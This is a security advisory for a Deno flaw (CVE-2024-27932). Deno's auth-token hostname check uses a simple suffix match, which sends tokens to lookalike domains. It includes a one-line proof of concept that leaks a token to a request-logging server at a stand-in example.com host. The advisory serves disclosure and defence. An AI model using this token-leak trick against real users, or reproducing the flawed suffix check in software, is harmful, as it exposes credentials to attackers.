Deno's improper suffix match testing for DENO_AUTH_TOKENS
Summary
Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com.
Details
authtokens.rs uses a simple endswith check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens.
PoC
Set up a server that logs requests. RequestBin will do. For example,
denovulnpoc.example.com.Run
DENO_AUTH_TOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example,DENO_AUTH_TOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.comObserve that the token intended only for the truncated domain is sent to the full domain
Impact
What kind of vulnerability is it? Who is impacted? Anyone who uses DENOAUTHTOKENS and imports potentially untrusted code is affected.
References
- https://github.com/denoland/deno/blob/3f4639c330a31741b0efda2f93ebbb833f4f95bc/cli/auth_tokens.rs#L89
- https://github.com/denoland/deno/commit/de23e3b60b066481cc390f459497d5bef42a899b
- https://github.com/denoland/deno/security/advisories/GHSA-5frw-4rwq-xhcr
- https://nvd.nist.gov/vuln/detail/CVE-2024-27932
- https://github.com/advisories/GHSA-5frw-4rwq-xhcr